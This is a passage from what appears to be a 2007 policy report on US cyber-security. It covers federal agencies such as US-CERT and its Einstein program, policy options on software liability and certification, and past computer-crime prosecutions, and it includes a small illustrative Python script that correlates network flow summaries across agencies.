[186] Ruggles, Steven. Historical Bush Approval Ratings. Dept. of Hist., U. of Minnesota. 2007. 27 Oct. 2007 <http://www.hist.umn.edu/~ruggles/Approval.htm>.
[187] "Interview: O. Sami Saydjari." Frontline: Cyber War! 23 Apr. 2003. PBS. 24 Oct. 2007 <http://www.pbs.org/wgbh/pages/frontline/shows/cyberwar/interviews/saydjari.html>.
[188] "Poll Shows Americans Want Congress to Do More to Protect Them Online." Cyber Security Industry Alliance (2006): 30. 21 Oct. 2007 <https://www.csialliance.org/news/pr/view?item_key=e5b543c0cf207bb110c9c65b61ac476ec45e03fe>.
[189] Hancock, Bill. National Infrastructure Protection Issues. International Telecommunication Union. 2002. 25 Oct. 2007 <http://www.itu.int/osg/spu/ni/security/workshop/presentations/cni.18.pdf>.

Current trends in public knowledge about cyber-security, and industries’ hesitance to disclose that they have experienced small-scale cyber-attacks, suggest that only cyber-attacks on a very large scale would actually receive public attention. For example, despite the successful disruption of air traffic control systems as recently as September 2007, there is no data to suggest that these cyber-incidents have discouraged the public from using commercial airlines. The public would likely have a strong, noticeable response against a company or section of infrastructure only if a cyber-attack of large magnitude were launched, or if a successful cyber-attack resulted in civilian casualties. If the public became aware of such an attack, the response would likely be similar to the public’s apprehension about using airlines immediately after September 11. Those attacks resulted in an immediate 30% decline in demand for commercial airline services, and an ongoing 7.4% decline through 2003. [191] A successful attack or a prolonged series of unsuccessful attacks would probably produce the same pattern: an immediate decline in public confidence, followed by a smaller, prolonged loss of confidence if no other incidents occurred.

[190] "Interview: O. Sami Saydjari." Frontline: Cyber War! 23 Apr. 2003. PBS. 24 Oct. 2007 <http://www.pbs.org/wgbh/pages/frontline/shows/cyberwar/interviews/saydjari.html>.
[191] Ito, Harumi, and Darin Lee. Assessing the Impact of the September 11 Terrorist Attacks on U.S. Airline Demand. Dept. of Econ., Brown U. 2004. 3-24. 26 Oct. 2007 <http://www.brown.edu/Departments/Economics/Papers/2003/2003-16_paper.pdf>.

5 National Agencies and Legislation

In order to coordinate an effort to secure cyberspace through federal initiatives, various documents have been created to define and dictate how the government prepares for and reacts to cyber-attacks. Also, several agencies have been created to regulate this information and to ensure that communication and awareness achieve cyber-security objectives. It is the responsibility of the various departments within the federal government to abide by these documents and to work with these agencies.

5.1 E-Government Act of 2002

The E-Government Act of 2002 serves as the origin of the government’s current role in cyber-warfare. The Act was enacted on December 17, 2002 (Public Law No. 107-347). [192] One of its main attributes is the role established for the Office of Management and Budget (OMB). The Director of OMB is required by FISMA (the Federal Information Security Management Act) [193] to oversee federal agency information security policies and practices, as well as to coordinate a thorough risk-based approach for managing information security issues. Also, the OMB oversees the operation of a central federal information security incident center, formerly known as FedCIRC. This center is now known as US-CERT and is discussed later in the report. The OMB, through US-CERT, provides guidance to federal agencies on types of cyber-attacks and on ways to report and communicate them throughout the government.

Another key point of the E-Government Act of 2002 is that it allows government agencies to use technology as a way of obtaining secure government information. Furthermore, the Act lists ways in which several departments are responsible for satisfying the need for cyber-warfare strategies.

Finally, the Act suggests that a Critical Infrastructure Protection Policy Coordinating Committee will advise the Homeland Security Council on policy amongst agencies related to protection against cyber-attacks. This Committee is now known as the NIAC. Passed on December 17, 2003, the Homeland Security Presidential Directive offers suggestions regarding the responsibilities of several governmental agencies.

5.2 National Infrastructure Advisory Council

The National Infrastructure Advisory Council (NIAC), formerly known as the President’s Critical Infrastructure Protection Board, operates within the U.S. Department of Homeland Security. The purpose of this council is to supply the President with enough information and advice to continue to secure critical infrastructure sectors and their information systems. [194] Consisting of at most 30 members, the NIAC is composed of citizens appointed by the President from areas such as private industry, academia, and state and local government.

[192] Bush, George W., and Jim Turner. "E-Government Act of 2002." The White House. 15 Nov. 2002. US Government. <http://www.whitehouse.gov/omb/egov/g-4-act.html>.
[193] "FISMA." National Institute of Standards and Technology. 24 Oct. 2002. US Government. <http://csrc.nist.gov/groups/SMA/fisma/>.
[194] "National Infrastructure Advisory Council." Department of Homeland Security. Oct. 2007. US Government. <http://www.dhs.gov/xprevprot/committees/editorial_0353.shtm>.

The NIAC focuses mostly on preventing attacks on critical infrastructure as well as on recovering from attacks. The NIAC notes that both the cyber and the physical functions of critical infrastructure are vital to maintaining the American economy, security, and way of life. Currently, the federal government has divided responsibility for cyber-infrastructure among several different departments. However, it should be noted that the devices that control our physical systems, such as power grids, are increasingly dependent on the Internet. As a result, a single cyber-attack has the ability to affect several of these areas.

5.3 National Strategy to Secure Cyberspace

The National Strategy to Secure Cyberspace, also known as the NSSC, is meant to inform and implore Americans to secure the sections of cyberspace that they own, operate, control, or utilize. [195] Securing cyberspace is a challenge that requires effort and awareness from the federal, state, and local governments, as well as from the private sector and American citizens. This document, published in February of 2003, can be seen as an interpretation of the National Strategy for the Physical Protection of Critical Infrastructure and Key Assets in terms of cyber-protection. Policies and guidelines found in both documents are represented in the missions of both federal and private agencies concerned with cyber-attacks.

5.4 United States Computer Emergency Response Team (US-CERT)

The United States Computer Emergency Response Team, also known as US-CERT, was created shortly after the release of the National Strategy to Secure Cyberspace. It allows the federal and private sectors together to relay information about cyber-incidents and situations. [196] US-CERT was established for the sole purpose of protecting the Internet against, and responding to, cyber-attacks. One key component of US-CERT is the Einstein Program, which enables the effective communication of cyber-incidents.

5.4.1 US-CERT Einstein Program

The Einstein Program allows agencies of the federal government to effectively distribute information about cyber-attacks so that it can be analyzed and shared between agencies. [197] This is significant because, due to the complexity and integration of the Internet in almost every critical infrastructure, many agencies find it difficult to relay any information without a uniform institution to assist in communication. By collecting information from participating federal agencies, US-CERT is able to build and enhance America’s cyber-related situational awareness. Likewise, the increase in awareness will help in identifying and responding to cyber-threats and attacks. Also, the more information is known about these attacks, the easier it is to improve network security, increase the resilience of electronically delivered government services, and enhance the survivability of the Internet.

[195] National Strategy to Secure Cyberspace. Feb. 2003. US Government. <http://www.whitehouse.gov/pcipb/policy_and_principles.pdf>.
[196] "United States Computer Emergency Readiness Team." Department of Homeland Security. US Government. <http://www.uscert.gov/>.
[197] "Privacy Impact Assessment EINSTEIN Program Collecting, Analyzing, and Sharing Computer Security Information Across the Federal Civilian Government." US-CERT. Sept. 2004. Department of Homeland Security. <http://www.dhs.gov/xlibrary/assets/privacy/privacy_pia_eisntein.pdf>.

There are several ways in which the Einstein program helps federal agencies protect themselves from cyber-attacks. The program is able to determine the scope and possible threat of a specific worm and how it relates to both the federal government and the Internet community. Also, detection of irregular network behavior is possible through the Einstein program, which is then able to take this information and determine whether the possible attack is focused on one agency or is part of a larger Internet-related attack. Likewise, specific agencies tend to have Internet traffic problems that may be attributed to outside cyber-attacks.

One of the most useful aspects of the Einstein program that US-CERT developed is its ability to decide how invasive and threatening an attack is, and what its resulting effect on the United States would be. [198] It is able to detect the source of an attack through the analysis of trends in cyber-incidents and IP tracking. These trends are documented in close to real time to raise awareness of their existence amongst federal agencies.
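As an added illustration (not part of the report, and not Einstein's or US-CERT's actual code), the following Python models the cross-agency correlation the report describes: flow summaries reported by several participating agencies are pooled, and each external source is classified as "focused" on a single agency or "broad" across several, which is the distinction between an isolated incident and a wider Internet-scale event. The record format, agency labels, addresses and thresholds are constructed assumptions.

```python
"""Toy model of pooling per-agency flow summaries and classifying each
external source as focused (one agency) or broad (several agencies).
Added example; field names, thresholds and data are assumptions."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class FlowSummary:
    agency: str    # reporting agency (constructed label)
    src_ip: str    # external source address (constructed, documentation range)
    dst_port: int  # destination port seen at the agency boundary
    flows: int     # number of flows from src_ip in the reporting window


# Constructed sample records, not real telemetry.
SAMPLE_RECORDS = [
    FlowSummary("agency-A", "192.0.2.10", 445, 1200),
    FlowSummary("agency-B", "192.0.2.10", 445, 950),
    FlowSummary("agency-C", "192.0.2.10", 445, 1100),
    FlowSummary("agency-A", "198.51.100.7", 22, 800),
    FlowSummary("agency-A", "198.51.100.7", 23, 600),
    FlowSummary("agency-B", "203.0.113.5", 80, 40),
]


def correlate(records, min_flows=100, broad_threshold=2):
    """Pool the per-agency summaries and classify each source.

    A source is reported only once its pooled flow count reaches
    min_flows (filters ordinary background noise). It is "broad" when
    at least broad_threshold distinct agencies reported it, otherwise
    "focused". Returns a dict keyed by source address.
    """
    by_src = defaultdict(lambda: {"agencies": set(), "ports": set(), "flows": 0})
    for r in records:
        entry = by_src[r.src_ip]
        entry["agencies"].add(r.agency)
        entry["ports"].add(r.dst_port)
        entry["flows"] += r.flows

    result = {}
    for src, e in by_src.items():
        if e["flows"] < min_flows:
            continue  # below the noise floor; no cross-agency notice
        scope = "broad" if len(e["agencies"]) >= broad_threshold else "focused"
        result[src] = {
            "agencies": sorted(e["agencies"]),
            "ports": sorted(e["ports"]),
            "flows": e["flows"],
            "scope": scope,
        }
    return result


def alert_lines(summary):
    """Render one line per source, the kind of near-real-time notice
    that would be shared back to the participating agencies."""
    lines = []
    for src in sorted(summary):
        e = summary[src]
        ports = ",".join(str(p) for p in e["ports"])
        lines.append(
            f"{e['scope'].upper():7} src={src} agencies={len(e['agencies'])} "
            f"ports={ports} flows={e['flows']}"
        )
    return lines


if __name__ == "__main__":
    for line in alert_lines(correlate(SAMPLE_RECORDS)):
        print(line)
```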

5.4.2 Collaborative Groups of US-CERT

● Government Forum of Incident Response and Security Teams (GFIRST) – Comprised of over 50 incident response teams [199], GFIRST helps coordinate the action and communication of several federal agencies in order to ensure the security of the federal government.

● Multi-State Information Sharing and Analysis Center (MS-ISAC) – MS-ISAC gathers information about how cyber-threats may affect critical infrastructure and then relays that information to state and local governments. [200] The significance of this group lies not only in the number of people involved in ensuring that communication is adequate, but also in its providing a means to raise awareness of, and response to, possible cyber-attacks. MS-ISAC is composed of volunteers who have formed their organization based on the needs discussed in the National Strategy to Secure Cyberspace.

[198] "Fact Sheet: Protecting America’s Critical Infrastructure – Cyber Security." US-CERT. Department of Homeland Security. <http://www.us-cert.gov/press_room/050215cybersec.html>.
[199] "Government Collaboration Groups and Efforts." US-CERT. Department of Homeland Security. <http://www.us-cert.gov/federal/collaboration.html>.
[200] "Government Collaboration Groups and Efforts." US-CERT. Department of Homeland Security. <http://www.us-cert.gov/federal/collaboration.html>.

● National Cyber Response Coordination Group (NCRCG) – Initially intended to join the Department of Defense with the Department of Justice in efforts to defend against cyber-attack, NCRCG is the federal government’s main interagency organization that focuses on responding to and recovering from cyber-attacks that affect national security. [201]

5.4.3 National Cyber Security Division (NCSD)

The National Cyber Security Division (NCSD) works collaboratively with public, private, and international entities to secure cyberspace and America’s cyber-assets. [202] The National Cyber Security Division continuously seeks to protect the critical cyber-infrastructure in order to ensure that a steady watch is kept for possible cyber-attacks.

5.4.3.1 National Cyberspace Response System

The National Cyberspace Response System coordinates the protocols that determine when actions may need to be taken in response to cyber-attacks, and which actions those are.

● Cyber Security Preparedness and the National Cyber Alert System – Due to the lack of awareness of cyber-threats, many citizens do not actually know whether their computer systems are secure, despite the level of security they think they have. Cyber-threats are constantly adapting to overcome new security measures. The Cyber Security Preparedness and National Cyber Alert System both help in raising awareness among citizens to try to reduce the susceptibility of their networks. Anyone can sign up to be alerted by these systems if new and significant information is obtained regarding cyber-threats.

● US-CERT Operations – As mentioned above, US-CERT is one of the most significant organizations that both analyzes and standardizes the level of threat each cyber-attack may pose. US-CERT makes it easier to determine the significance of a possible attack through its well-thought-out and established method of prioritizing attacks.

● National Cyber Response Coordination Group – A group that interacts with US-CERT, the NCRCG’s significance is noted above. In terms of response, NCRCG is significant due to its 13 participating federal agencies, which help determine what response is necessary in case of an attack. The NCRCG helps coordinate the federal response, law enforcement, and the intelligence community in the case of an attack.

[201] "Government Collaboration Groups and Efforts." US-CERT. Department of Homeland Security. <http://www.us-cert.gov/federal/collaboration.html>.
[202] "National Cyber Security Division." Department of Homeland Security. 23 Sept. 2006. US Government. <http://www.dhs.gov/xabout/structure/editorial_0839.shtm>.

● Cyber Cop Portal – Meant to share information amongst over 5,500 investigators worldwide, the Cyber Cop Portal helps find and convict the people responsible for cyber-attacks.

5.4.3.2 Cyber Risk Management Programs

The National Cyber Security Division is able to evaluate the risk and determine what kind of protective measures are necessary to secure cyberspace. The following three programs are part of the Cyber-Risk Management Program:

● Cyber Exercises: Cyber Storm – Cyber Storm began in February of 2006 in order to evaluate preparedness in responding to a cyber-attack. The Department of Homeland Security used Cyber Storm to determine how well equipped the federal agencies were in case an attack were to happen. Also, DHS extended the Cyber Storm exercise to the private and international sectors. The involvement of the private sector shows how defense against cyber-attacks is both a government and an industry responsibility.

● National Outreach Awareness Month – October of every year is known as National Outreach Awareness Month and is meant to raise awareness of the threat of cyber-attacks.

● Software Assurance Program – Intended to lessen the susceptibility of software programs, the SAP also suggests ways to improve the development and installation of software products.

6 Policy

6.1 National Policies

The United States Government has recently dedicated a portion of the Department of Homeland Security to securing and protecting Americans from cyber-attacks. Current policies and guiding principles are vital to determining the progress the government has made in ensuring that its citizens are protected from cyber-attacks. The establishment of agencies to protect against cyber-attacks and raise awareness of them has proliferated throughout the Department of Homeland Security, but many flaws and a lack of funding for these agencies still show the need for more cooperative support against possible cyber-offenses.

The current national policy, the National Strategy to Secure Cyberspace (NSSC), outlines the direction of current government policy for dealing with cyber-warfare. The current policy from the NSSC has served as a baseline for the following policy analysis, with additional policy suggestions included.

Current national policies regarding the ways in which the federal government has mandated how to secure cyberspace are to: [203]

● Prevent cyber-attacks against our critical infrastructures
● Reduce our national vulnerabilities to cyber-attack
● Minimize the damage and recovery time from cyber-attacks that do occur
● Ensure the federal government’s ability to perform essential national security missions and guarantee the general public’s health and safety
● Make sure that state and local governments are able to maintain order and to deliver minimum essential public services
● Aid the private sector’s capability to ensure the orderly functioning of the economy and the delivery of essential services
● Support the public’s morale and confidence in our national economic and political institutions.

6.2 Policy Goals

Although the NSSC was used as a starting point, the current government policy is not enough to protect our nation from cyber-warfare. First we will discuss guiding principles to keep in mind as the government defines a new policy, as well as the primary stakeholders for our policy. Our policy discussion will then be broken into six major areas:

● Prevention
● Response
● Security Training and Awareness
● Government Cyber-security
● International Cyber-warfare
● Military Uses of Cyber-warfare

[203] "National Policy and Guiding Principles." National Strategy to Secure Cyberspace. Feb. 2003. US Government. <http://www.whitehouse.gov/pcipb/policy_and_principles.pdf>.

6.3 Guiding Principles

Any cyber-security policies that the government decides to enact should not only minimize or prevent disruptions in critical infrastructures to protect American national security, but also adhere to some guiding principles to protect civil liberties and ensure cooperation from all sectors.

One such guiding principle is the idea that American cyber-security must be a national effort. Thus, the government must work with private and commercial groups to formulate policies that are both technologically sound and agreeable to all parties. In doing this, any policies the government employs must strengthen cyber-security with regard to personal privacy, rather than infringing upon privacy. Outside privacy analysts and experts should frequently be consulted to ensure that nonpublic information is handled reliably and privately.

Another guiding principle is that, in most cases, the government should avoid mass regulation of cyber-security. Setting a mandate for how corporations must protect their networks would create a “lowest common denominator approach to cyber-security,” which could easily be exploited on a widespread scale. Currently, some federal regulatory agencies have guidelines for cyber-security, but in the private sector the market itself should force the evolution of cyber-security technologies.

Furthermore, because of the rapidly changing nature of cyber-threats, it is essential that all cyber-security policies be flexible in their ability to prevent and respond to attacks. Flexible policies allow both government and corporate organizations to reassess threats and plan protection strategies based on growing and changing threats. Because these threats are constantly growing, it is essential that government agencies form long-term (multi-year) plans for updating cyber-security so that they can sustain their roles in protecting American national security. It is also recommended that other public- and private-sector organizations adopt long-term plans for this reason.

6.3.1 Social Considerations

In formulating policies to protect against cyber-attacks, there is the potential for negative social consequences. One such consequence is the loss of privacy in cyberspace, which has already occurred as the result of some government security policies. From 2000 to 2001, the FBI used an email-surveillance system called Carnivore, a byproduct of the US PATRIOT Act, which operated as a basic packet-sniffer, to monitor the electronic transmissions on the networks of Internet service providers. However, this system and systems like it could violate federal privacy laws and the United States Constitution’s ban on unreasonable searches and seizures. The Carnivore system intercepted the traffic of all users on whatever network it was connected to, a practice which former federal prosecutor Mark Rasch describes as “the electronic equivalent of listening to everybody's phone calls to see if it's the phone call you should be monitoring.” Though the warrantless wiretapping system was reportedly discontinued, it serves as a warning of the social hazards that can result from implementing badly planned policies. [204]

In addition to monitoring Internet traffic, the government could also decide to block access to certain websites. For example, the European Union recently signed legislation to block access to websites with information about bomb-making. The Australian government is planning to allow the Australian federal police to compile a list of websites suspected of being related to terrorism, which Internet filters will be required to block. In the wake of these international events, the United States has argued before a federal court that it has the right to restrict access to legal websites that are hosted anywhere in the world. Beyond the risk to civil liberties, restricting international content could cause an “arms race” over Internet censorship: if the United States has the right to block information from other countries, then those other countries can directly censor information based in the United States as well. [205]

Due to the dangers to privacy, it is important that the public and private sectors be dealt with as independent but cooperating entities when forming cyber-security policies. While the federal government must develop the cyber-security technologies that provide a basis for the public, the private sector generally develops these security products and is itself responsible for adhering to good security practices. For example, the Global Information Grid, a multibillion-dollar military project to link weapons, intelligence, and personnel, interconnects with networks in the civilian sector, and is therefore vulnerable to any threat to which civilian networks could be vulnerable. Military and civilian networks must work together to come up with a defense system that will be suitable to both parties without infringing on the civil rights granted by the Constitution. [206]

6.4 Stakeholders

American citizens are the primary stakeholders in regard to cyber-attacks against the US. Other stakeholders are the US government, state and local governments, other nations and their citizens, private companies, health and medical institutions, financial institutions, and various departments within the US government (such as the Department of Justice). In an analysis of dependency on the Internet, it is difficult to determine which well-established country would not be affected if cyber-attacks were to become more prevalent. It appears that the more dependent a nation becomes on the Internet, the more secure its government is required to be in order to ensure it will not be affected by cyber-attacks. Similarly, citizens and private companies can be negatively affected if their networks are exploited. Electronic medical records are at stake, as well as the financial status of citizens and companies. The Federal Government has made special note of particular stakeholders, as seen in the figure below. These stakeholders include the home user and small business, large enterprise, critical infrastructures and sectors, national implications, and global.

[204] <http://www.wired.com/politics/law/news/2000/07/37503>.
[205] <http://abcnews.go.com/Technology/Story?id=3771510&page=1>.
[206] <http://www.nitrd.gov/pitac/reports/20050301_cybersecurity/cybersecurity.pdf>.

Figure 6.1 Roles and Responsibilities in Securing Cyberspace from NSSC

● Home User and Small Business – Stakeholders in this category rarely communicate incidents, according to US-CERT. However, many of the cyber-attacks discovered develop through the use of their systems. Home and small business users are prevalent stakeholders in securing cyberspace.

● Large Enterprise – Bigger companies are stakeholders in relation to cyber-attacks because of their dependency on network systems. Many of their records and critical documentation are electronically stored and accessed on their networks, and destruction or damage would adversely affect their business and profits.

● Critical Infrastructure and Sectors – Critical infrastructures can be physically affected by a cyber-attack. These sectors are becoming increasingly dependent on software and network systems and are thus vulnerable to cyber-attacks.

● National Implications – The US government is a primary stakeholder in cyber-attacks. If damage or information theft were to occur to federal systems, chaos and lack of control could ensue and threaten national security.

● Global – International stakeholders are affected by cyber-attacks because of the range of damage these attacks can span. The Internet and networks cross the globe, so an attack in a geographically different area could still result in damage in another location.

6.5 Prevention

Many cyber protection and warning systems are currently available from both private and government organizations. Most major software publishers also employ personnel who specialize in security issues and work to correct their software quickly once vulnerabilities are revealed. In organizations with critical networks, there are often professionals in place who are responsible for protecting the systems from cyber-attack. The software market is aware of the need for cyber security and has responded by providing a wide variety of services which attempt to satisfy the need for defense. The government currently has agencies in place which receive reports on cyber incidents, research them, observe trends, and publish appropriate warnings. While a wide variety of warnings, products and services exist for the purpose of preventing cyber damage, major issues remain which leave systems open to attack.

6.5.1 Prevention Challenges

While it is impossible to prevent all cyber-attacks and make computer systems completely invulnerable, there are many changes in behavior that could greatly reduce vulnerabilities. Any policies created to address issues in preventing cyber-damage should take these problems into consideration.

● Security in cyber-space is a never-ending arms race between attackers and security professionals; it is incorrect to assume that one can simply buy a product and be secure. Despite the promises some of these products tend to make, attackers work constantly to circumvent them. Preventing cyber damage requires more attention than buying a product and ignoring it.

● Warnings of newly found security vulnerabilities and software updates designed to address new problems are common, but many administrators neglect to heed these warnings and update their systems. Critical systems can sometimes be found with software that is years behind current security standards, due to the difficulty in updating software and the ignorance of the people maintaining the systems.

● Companies which experience attacks and publishers of software containing security vulnerabilities often fail to provide information which could be used to prevent further damage, because of fears that admitting to security failures will damage their reputations. Requiring software makers to disclose defects to potential customers would improve security but could also harm business.

● Warnings of vulnerabilities and published material about securing computers present solutions as well as new problems. Attackers can use this knowledge to develop their attacking skills just as easily as administrators can use the information to improve their defenses. Sometimes the warnings inspire attackers to take advantage of newly published vulnerabilities faster than the same warnings can be addressed by system administrators.

● The attackers themselves, who are constantly developing new cyber-attack strategies, have security information resources of their own, many of which can be viewed by security personnel and used to anticipate their attacks.

● Releasing information relating to security requires good judgment in order to prevent problems; this “security through obscurity” issue is one of the most debated points in the cyber-security community.

● Experts in computer security have conflicting opinions on the best ways to protect systems; any mandates relating to system security will need to include flexibility to allow for the different approaches used by different system protectors.

6.5.2 Prevention Products

There are a wide variety of tools on the market that are sold for the purpose of securing computers, though these products are not available for every vulnerable platform, especially the proprietary systems which were not reliant on computers in the past. As products are developed, new exploits are also made which present new kinds of threats. The previous examples (see 2.3.2) about Distributed Denial of Service attacks and Rootkits are relatively new attacks. Before 1999, the old style of DoS attack from a single attacking system was addressed by firewalls and largely prevented, which led to the development of new methods of attack. Programs employing stealth techniques meant to evade detection and removal by security products like virus scanners have become much more prevalent in recent years. The anti-virus company McAfee reports the following trend in new software which attempts to avoid detection:

Figure 6.2 207

While attacks are becoming more sophisticated, products designed to prevent them are also adapting. Employing the appropriate products is definitely helpful in improving security, but system administrators must be careful not to rely on those products too much. Firewalls, Intrusion Detection Systems, system logging tools, virus scanners, and automated software updates are some of the types of products available to assist in securing computers, but they cannot completely prevent attacks without people in place to protect critical systems. The number of solutions available can be overwhelming, and many products make false promises. Currently the only method of confirming that a security company actually increases security and has products that do what they promise is the market and the media. One step that could be taken to prevent cyber-attack is an institution that independently confirms whether a software product actually delivers the security that it promises, perhaps in a similar way to the FDA’s process of confirming that drugs actually do what their sellers promise, though this also raises concerns about the impact on the fragile software industry.

6.5.3 Security Personnel

Many professionals are employed to protect computer networks, and have varying degrees of success doing so. One of the more popular excuses for the failure of system protection is under-trained administrators. The cyber-attack situation is unique in that every networked device is a potential target, and security professionals are needed in more places than they were in the past. Businesses are rapidly realizing that cyber-security is part of the cost of doing business today, often after suffering from an attack that their IT department was not prepared to prevent.

207 Rootkits: The Growing Threat. 2006 McAfee Inc. 1 Nov 2007. <http://download.nai.com/products/mcafee-avert/WhitePapers/AKapoor_Rootkits1.pdf>

Many private certifications exist that confirm an employee is trained in cyber-security; unfortunately, cyber-security is an ever-changing field and requires constant study to remain prepared. A system of licensure for cyber-security professionals would help to ensure that competent personnel are selected to defend critical systems. Further, a standard could be defined that clarifies which systems need such professionals to protect them. Addressing the issue of ignorant security personnel is complex, because administrators are in a constant race against hackers to learn about vulnerabilities and defense strategies, and many organizations now relying on computer networks are not aware that they need trained employees to defend them.

6.5.4 New Vulnerabilities

Products and personnel who work to protect their systems can help to prevent cyber-attacks, but another important area to address in potential policy is how software reaches the public with flawed security in the first place. Software developers bear a great responsibility in distributing products which do not leave their customers vulnerable to cyber-attack. Much speculation exists about the reasons that so many flaws exist in current software.

6.5.5 Computer Security and Liability

There are active debates on how liable producers of software should be for vulnerabilities introduced into systems by their products. Most products which contain these security flaws are distributed with “End User License Agreements” which take effect as a condition of installing the software. These agreements usually contain language that exempts the software companies from all responsibility for any attacks that their customers may suffer through vulnerabilities in their products. Courts have repeatedly upheld these agreements, to the point that holding software authors liable for security flaws in their products would require changes to the law.

Despite this lack of liability for vulnerabilities in their products, software companies still have an incentive to make secure programs. The damage to a company’s reputation after enabling a new kind of attack on its customers can cost a business a lot of money. In this way, while they are not legally liable, they remain morally liable and continually work to improve their security, though perhaps not as well as they would if vulnerabilities in their products were a greater financial risk for them. The debate surrounding software liability also raises concerns about increased software costs and the extra difficulty involved in identifying vulnerabilities in software compared to defects in physical products.

6.5.6 Policy Options

Taking these challenges into consideration, there are several possibilities for policy changes that could help to prevent successful cyber-attacks, which can be applied to individuals, security professionals, and the designers of networks. Each potential policy would require careful wording and sensitivity to the needs of businesses and the rights of individuals as well as the technical consequences.

Policy Option 6.5.1: Require by law that all computers be secured in specific ways.

A policy that demands all systems be secured is a tempting idea, but carries with it many consequences. Explicitly defining which precautions to take about cyber-security increases government encroachment on individuals and, if worded improperly, could actually make computers less secure. Diversity is an important part of system protection, which a law explicitly demanding specific security precautions might eliminate, actually giving attackers more potential targets. A law requiring security precautions would need to be worded in abstract terms to allow for the diverse systems which currently exist. Specific security measures required by law might raise the cost of computers and reduce the performance of the technology. Defining a bare minimum of precautions that must be taken might lead to fewer systems protecting themselves beyond that minimum. It may be possible to create a law which requires certain precautions with minimal negative side effects and could reduce vulnerability, but such a law would have to be created very carefully.

Policy Option 6.5.2: Change the policies about liability for software makers and/or system administrators.

A policy might be drafted which could hold system administrators responsible for damage caused by their systems. The law would give administrators a larger motivation to secure their systems so that attackers could not commandeer them and execute attacks. In a way, administrators are already responsible for their systems, because security breaches under their watches tend to hurt their careers, so the necessity of this policy is debatable. Changes in liability rules would increase the stress put on those with increased responsibility, possibly raise the cost of their service and reduce the number of people willing to take the risk of working to protect networks. For some systems, changes in liability rules might be more appropriate than for others. For example, administrators responsible for maintaining networks controlling critical infrastructures or connected to extremely high-capacity Internet links might deserve more legal motivation to secure their systems than owners of personal computers.

Applying new responsibility to software developers would slow down the development process and increase the cost. Software prices would rise to offset the legal costs relating to new liabilities, while programmers would be under legal pressure to secure their products, possibly at the expense of performance. The private sector already has motivation to secure its products, but perhaps is not as concerned as it should be that flaws in one system can be used to cause damage to the systems of others. Certain violations of software security might be more appropriate to hold developers responsible for than others; it may be possible to make adjustments in liability rules which improve security with minimal impact on the cost and performance of software. Imported software and outsourced developers would also have to be taken into consideration in any policy about the liability of software developers.

Policy Option 6.5.3: Create programs to approve security products and personnel.

Institutions exist for the licensure of many different professionals and the approval of different products, and similar institutions might be created to address cyber-attack possibilities. Policy makers can expect debates over whether government or the private sector can better provide cyber-security approval services. Having a compulsory form of certification may be helpful, since current methods of approving software and personnel for security still allow for false products and charlatan professionals to exist. A government approval process for allowing individuals to practice securing systems would have to be carefully crafted by experts to ensure that certified individuals are qualified for their positions. Creating new institutions would be costly, and defining the specific software packages and personnel under their jurisdiction would be difficult, but having more qualified security personnel and higher quality defense products would be helpful.

Additionally, infrastructure has significant holes in prevention measures.

Policy Option 6.5.4: Federally demand a minimum level of security for critical infrastructure systems.

In 2001, the Energy Information Security program was created in an attempt to develop better defense technologies for our nation's critical infrastructures. Due to the difficulty of and the time needed for installing these technologies, many companies have not kept their systems up to date. Because they are not properly secured, even the "secured" infrastructure companies are left vulnerable to attack simply because they are connected to the same network as the unprotected companies. Therefore, the minimum level of security for our nation's infrastructure must be federally regulated so that the United States' power utilities, water lines, communication systems, and emergency response will not fail due to a "weak link" in their network connections.

6.6 Response

6.6.1 Judicial Response to Past Attacks

One of the main difficulties in prosecuting cyber attackers is that they are difficult to capture and apprehend. Taking legal action against these criminals is still relatively uncommon in the federal and state governments; therefore many of the established fines and lengths of imprisonment are subjective. A few examples of past sentences handed down to individuals show the extensive differences between damage and punishment. The only known instances in which the fine charged to the criminal and the cost of the damage caused were the same were in incidents involving disgruntled employees and the company that employed them. The case information presented below was found at the Department of Justice’s website for Computer Crime Cases.208

208 "Computer Crime Cases." Computer Crime and Intellectual Property Section. US Department of Justice. <http://www.usdoj.gov/criminal/cybercrime/cccases.html>.

6.6.1.1 Russian Man Sentenced for Hacking into Computers in the United States

Russian citizen Alexey Ivanov pleaded guilty to several charges of conspiracy, hacking, computer fraud, credit card and wire fraud, and extortion. From Russia, Ivanov and others hacked into dozens of United States computers. After extracting important data such as passwords and credit card information, Ivanov and the others then deleted all of the original data and destroyed the computer systems. The estimated cost of damage was approximately $25 million. Ivanov was sentenced, at the age of twenty-three, to four years in prison and three years of supervised release. US Attorney Kevin O’Connor played a major part in Ivanov’s trial, and he remarked that Ivanov’s prosecution “demonstrates the ability and resolve of the Department of Justice to vigorously investigate and pursue cyber-criminals who attack American computer systems. We are committed to tracking down and prosecuting those individuals wherever they may be.”

6.6.1.2 Melissa Virus

Much of the information regarding the legal action taken against the creator of the Melissa Virus, David L. Smith of New Jersey, is private and has not been fully disclosed to the public. However, it is known that the maximum sentence he could be given by the state government is 5 years in prison and a $250,000 fine. In federal court, the cyber-criminal could be facing 10 years in prison and a $150,000 fine. Officially, the Melissa Virus caused over $80 million in damage.

6.6.1.3 Disgruntled Employee

Timothy Allen Lloyd of Delaware has begun serving 41 months in prison and was ordered to pay $2 million for setting off a “time bomb” that deleted all the production programs used by his former employer. The cost of the damage caused by this cyber-attack was over $10 million.

6.6.1.4 Israeli Citizen Arrested in Israel for Hacking Government Computers

United States and Israeli government computers, as well as hundreds of commercial and educational systems, were hacked into and attacked by Ehud Tenenbaum in February of 1998. He pursued these attacks to extract sensitive data from all systems and damage the attacked computers. Tenenbaum was sentenced to 12 months’ probation and a $17,000 fine.

Tenenbaum’s capture was an orchestrated effort by both the United States and Israeli governments. Attorney General Janet Reno said that “the prompt arrest of the Israeli hacker demonstrates the effectiveness of international cooperation in cases involving transnational criminal conduct”.209

6.6.1.5 Konopka Attacks

Between February 14, 1998 and January 25, 2001 Joseph Konopka of Wisconsin committed 9 different violations of federal law relating to conspiracy, destruction of energy, air navigation and telecommunication facilities, arson, trafficking in counterfeit goods, and causing damage to a protected computer. It was also reported that 53 acts attributed to Konopka caused extensive damage and that more acts were planned had he not been discovered and prosecuted. Konopka knowingly caused 28 power outages and other disruptions which affected 30,000 power customers and caused over $800,000 in damages. The maximum sentence he can serve is 5 years in prison with a $250,000 fine.

209 "Israeli Citizen Attacks Government Computers." Computer Crime and Intellectual Property Section. US Department of Justice. <http://www.usdoj.gov/criminal/cybercrime/cccases.html>.

Clearly, there is a disconnect between the punishment for cyber-crimes and the crimes themselves. The judicial system is extremely limited in prosecuting cyber-criminals, and even when an attacker is caught, they are soon released and back online.
